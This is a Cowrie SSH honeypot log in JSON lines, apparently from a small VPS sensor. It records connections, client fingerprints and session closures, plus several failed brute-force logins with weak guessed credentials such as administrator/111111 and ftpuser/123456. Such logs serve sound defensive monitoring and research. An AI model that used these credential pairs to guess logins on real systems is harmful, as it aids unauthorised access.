{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:10:02.937328Z","src_ip":"212.227.125.160","session":"6d0b7464cb42"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"111111","message":"login attempt [administrator/111111] failed","sensor":"my-vps","timestamp":"2025-08-28T12:10:03.567447Z","src_ip":"212.227.125.160","session":"6d0b7464cb42"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:10:04.738337Z","src_ip":"212.227.125.160","session":"6d0b7464cb42"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60642,"dst_ip":"1.2.3.4","dst_port":22,"session":"78ec1b75f84e","protocol":"ssh","message":"New connection: 212.227.125.160:60642 (1.2.3.4:22) [session: 78ec1b75f84e]","sensor":"my-vps","timestamp":"2025-08-28T12:10:41.629812Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:10:41.732002Z","src_ip":"212.227.125.160","session":"78ec1b75f84e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:10:41.865165Z","src_ip":"212.227.125.160","session":"78ec1b75f84e"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"1234567","message":"login attempt [administrator/1234567] failed","sensor":"my-vps","timestamp":"2025-08-28T12:10:42.464466Z","src_ip":"212.227.125.160","session":"78ec1b75f84e"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:10:43.648234Z","src_ip":"212.227.125.160","session":"78ec1b75f84e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41892,"dst_ip":"1.2.3.4","dst_port":22,"session":"43b9fbe128b7","protocol":"ssh","message":"New connection: 212.227.125.160:41892 (1.2.3.4:22) [session: 43b9fbe128b7]","sensor":"my-vps","timestamp":"2025-08-28T12:11:21.688928Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:11:21.689825Z","src_ip":"212.227.125.160","session":"43b9fbe128b7"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:11:21.853343Z","src_ip":"212.227.125.160","session":"43b9fbe128b7"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"123456","message":"login attempt [ftpuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T12:11:22.349735Z","src_ip":"212.227.125.160","session":"43b9fbe128b7"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:11:23.540316Z","src_ip":"212.227.125.160","session":"43b9fbe128b7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54878,"dst_ip":"1.2.3.4","dst_port":22,"session":"2245607b74c0","protocol":"ssh","message":"New connection: 212.227.235.229:54878 (1.2.3.4:22) [session: 2245607b74c0]","sensor":"my-vps","timestamp":"2025-08-28T12:11:29.844140Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:11:30.169776Z","src_ip":"212.227.235.229","session":"2245607b74c0"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T12:11:30.170421Z","src_ip":"212.227.235.229","session":"2245607b74c0"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:11:31.178178Z","src_ip":"212.227.235.229","session":"2245607b74c0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54884,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e8f6ea1e020","protocol":"ssh","message":"New connection: 212.227.235.229:54884 (1.2.3.4:22) [session: 2e8f6ea1e020]","sensor":"my-vps","timestamp":"2025-08-28T12:11:31.393128Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:11:31.703599Z","src_ip":"212.227.235.229","session":"2e8f6ea1e020"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T12:11:31.704588Z","src_ip":"212.227.235.229","session":"2e8f6ea1e020"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60110,"dst_ip":"1.2.3.4","dst_port":22,"session":"7724448cdf70","protocol":"ssh","message":"New connection: 212.227.125.160:60110 (1.2.3.4:22) [session: 7724448cdf70]","sensor":"my-vps","timestamp":"2025-08-28T12:11:31.979178Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:11:31.980069Z","src_ip":"212.227.125.160","session":"7724448cdf70"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T12:11:32.038815Z","src_ip":"212.227.125.160","session":"7724448cdf70"}
{"eventid":"cowrie.login.failed","username":"sol","password":"qwerty1234","message":"login attempt [sol/qwerty1234] failed","sensor":"my-vps","timestamp":"2025-08-28T12:11:32.218543Z","src_ip":"212.227.125.160","session":"7724448cdf70"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:11:32.701715Z","src_ip":"212.227.235.229","session":"2e8f6ea1e020"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54890,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e3cd17b0c51","protocol":"ssh","message":"New connection: 212.227.235.229:54890 (1.2.3.4:22) [session: 0e3cd17b0c51]","sensor":"my-vps","timestamp":"2025-08-28T12:11:32.873254Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:11:33.171276Z","src_ip":"212.227.235.229","session":"0e3cd17b0c51"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T12:11:33.171970Z","src_ip":"212.227.235.229","session":"0e3cd17b0c51"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:11:33.279075Z","src_ip":"212.227.125.160","session":"7724448cdf70"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:11:34.173933Z","src_ip":"212.227.235.229","session":"0e3cd17b0c51"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":62238,"dst_ip":"1.2.3.4","dst_port":22,"session":"019680e75861","protocol":"ssh","message":"New connection: 217.72.205.35:62238 (1.2.3.4:22) [session: 019680e75861]","sensor":"my-vps","timestamp":"2025-08-28T12:11:45.327829Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:11:45.329107Z","src_ip":"217.72.205.35","session":"019680e75861"}
{"eventid":"cowrie.session.connect","src_ip":"172.236.228.220","src_port":30558,"dst_ip":"1.2.3.4","dst_port":22,"session":"29a218b56c71","protocol":"ssh","message":"New connection: 172.236.228.220:30558 (1.2.3.4:22) [session: 29a218b56c71]","sensor":"my-vps","timestamp":"2025-08-28T12:11:56.095107Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:11:56.402942Z","src_ip":"172.236.228.220","session":"29a218b56c71"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T12:11:56.403868Z","src_ip":"172.236.228.220","session":"29a218b56c71"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:11:57.475697Z","src_ip":"172.236.228.220","session":"29a218b56c71"}
{"eventid":"cowrie.session.connect","src_ip":"172.236.228.220","src_port":30574,"dst_ip":"1.2.3.4","dst_port":22,"session":"ead7333bc387","protocol":"ssh","message":"New connection: 172.236.228.220:30574 (1.2.3.4:22) [session: ead7333bc387]","sensor":"my-vps","timestamp":"2025-08-28T12:11:57.658135Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:11:57.970078Z","src_ip":"172.236.228.220","session":"ead7333bc387"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T12:11:57.971239Z","src_ip":"172.236.228.220","session":"ead7333bc387"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48764,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b0f651659c4","protocol":"ssh","message":"New connection: 212.227.125.160:48764 (1.2.3.4:22) [session: 3b0f651659c4]","sensor":"my-vps","timestamp":"2025-08-28T12:11:58.614347Z"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:11:58.958700Z","src_ip":"172.236.228.220","session":"ead7333bc387"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:11:59.054811Z","src_ip":"212.227.125.160","session":"3b0f651659c4"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T12:11:59.055573Z","src_ip":"212.227.125.160","session":"3b0f651659c4"}
{"eventid":"cowrie.session.connect","src_ip":"172.236.228.220","src_port":30582,"dst_ip":"1.2.3.4","dst_port":22,"session":"44ed2808a8d5","protocol":"ssh","message":"New connection: 172.236.228.220:30582 (1.2.3.4:22) [session: 44ed2808a8d5]","sensor":"my-vps","timestamp":"2025-08-28T12:11:59.131764Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:11:59.486787Z","src_ip":"172.236.228.220","session":"44ed2808a8d5"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T12:11:59.487436Z","src_ip":"172.236.228.220","session":"44ed2808a8d5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34582,"dst_ip":"1.2.3.4","dst_port":22,"session":"65b3728766e9","protocol":"ssh","message":"New connection: 212.227.125.160:34582 (1.2.3.4:22) [session: 65b3728766e9]","sensor":"my-vps","timestamp":"2025-08-28T12:11:59.685458Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:11:59.686296Z","src_ip":"212.227.125.160","session":"65b3728766e9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:11:59.860732Z","src_ip":"212.227.125.160","session":"65b3728766e9"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:12:00.142791Z","src_ip":"212.227.125.160","session":"3b0f651659c4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48772,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef545ee265dd","protocol":"ssh","message":"New connection: 212.227.125.160:48772 (1.2.3.4:22) [session: ef545ee265dd]","sensor":"my-vps","timestamp":"2025-08-28T12:12:00.298270Z"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:12:00.622392Z","src_ip":"172.236.228.220","session":"44ed2808a8d5"}
